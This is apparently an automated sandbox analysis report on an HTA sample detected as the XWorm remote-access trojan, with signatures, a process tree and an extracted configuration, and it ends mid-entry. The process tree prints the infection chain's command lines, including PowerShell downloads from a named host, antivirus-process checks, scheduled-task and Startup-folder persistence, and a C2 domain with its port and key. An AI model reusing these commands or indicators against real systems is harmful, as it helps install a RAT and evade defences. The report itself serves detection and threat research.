Edit tour

Windows Analysis Report
c2.hta

Overview

General Information

Sample name:	c2.hta
Analysis ID:	1573240
MD5:	de40615d23be7832504bc1c01202d7b9
SHA1:	557830552d122948342df79e818af09a7f9c8b1f
SHA256:	594add2b608976f962a956425ea8883c4e363b7cef956caed54c6f0f29abc999
Tags:	htauser-abuse_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Drops large PE files

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Sigma detected: PowerShell Web Download

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7232 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

wscript.exe (PID: 7380 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7480 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Acrobat.exe (PID: 7608 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7904 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 8124 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1664,i,11365846873852603877,16222139913176040509,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

cmd.exe (PID: 7632 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7764 cmdline: powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 8496 cmdline: "C:\Windows\System32\cmd.exe" /c mkdir "C:\Users\user\AppData\Local\Temp\msword" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8580 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8656 cmdline: powershell -Command "Expand-Archive -Path 'C:\Users\user\AppData\Local\Temp\msword.zip' -DestinationPath 'C:\Users\user\AppData\Local\Temp\msword' -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

msword.exe (PID: 8880 cmdline: "C:\Users\user\AppData\Local\Temp\msword\msword.exe" MD5: C744E054E4EF01832BBF43B81D397B61)

cmd.exe (PID: 8972 cmdline: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 9024 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 9032 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 9084 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 9092 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9128 cmdline: cmd /c md 220239 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 9144 cmdline: findstr /V "DimPieLilHot" Statistical MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 9156 cmdline: cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Carter.pif (PID: 9172 cmdline: Carter.pif F MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 4040 cmdline: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8248 cmdline: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 8268 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5928 cmdline: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

choice.exe (PID: 9188 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

svchost.exe (PID: 7972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

wscript.exe (PID: 404 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

DanielPulse.scr (PID: 8340 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 2336 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

DanielPulse.scr (PID: 7760 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3491947145.000000000184B000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa038:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9a14:$cnc4: POST / HTTP/1.1
00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3546191644.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9a98:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9b35:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9c4a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9474:$cnc4: POST / HTTP/1.1
00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3546191644.0000000003E40000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xdf70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xe00d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xe122:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd94c:$cnc4: POST / HTTP/1.1
00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3546191644.0000000003DFE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa2a0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa33d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa452:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9c7c:$cnc4: POST / HTTP/1.1
0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002C.00000002.4143164182.00000000009E2000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9e18:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9eb5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9fca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x97f4:$cnc4: POST / HTTP/1.1
0000002C.00000002.4145311596.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3546333240.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa280:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa31d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa432:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9c5c:$cnc4: POST / HTTP/1.1
00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3546306644.0000000003E43000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaf70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xb00d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xb122:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa94c:$cnc4: POST / HTTP/1.1
00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000020.00000003.3546191644.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3ea8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10c50:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1c458:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x272c8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3f45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10ced:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1c4f5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x27365:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x405a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x10e02:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1c60a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2747a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3884:$cnc4: POST / HTTP/1.1 0x1062c:$cnc4: POST / HTTP/1.1 0x1be34:$cnc4: POST / HTTP/1.1 0x26ca4:$cnc4: POST / HTTP/1.1
Process Memory Space: Carter.pif PID: 9172	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegAsm.exe PID: 5928	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
32.3.Carter.pif.3db2268.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
32.3.Carter.pif.3db2268.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7bf4:$cnc4: POST / HTTP/1.1
32.3.Carter.pif.3e14c38.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
32.3.Carter.pif.3e14c38.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7bf4:$cnc4: POST / HTTP/1.1
44.2.RegAsm.exe.9e0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
44.2.RegAsm.exe.9e0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x99f4:$cnc4: POST / HTTP/1.1
32.3.Carter.pif.3db2268.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
32.3.Carter.pif.3db2268.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
32.3.Carter.pif.3db2268.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x99f4:$cnc4: POST / HTTP/1.1
32.3.Carter.pif.3e14c38.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
32.3.Carter.pif.3e14c38.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x15820:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x20690:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x158bd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2072d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x159d2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x20842:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x99f4:$cnc4: POST / HTTP/1.1 0x151fc:$cnc4: POST / HTTP/1.1 0x2006c:$cnc4: POST / HTTP/1.1
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 9172, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 5928, ProcessName: RegAsm.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7232, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\temp.js", ProcessId: 7380, ProcessName: wscript.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4040, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 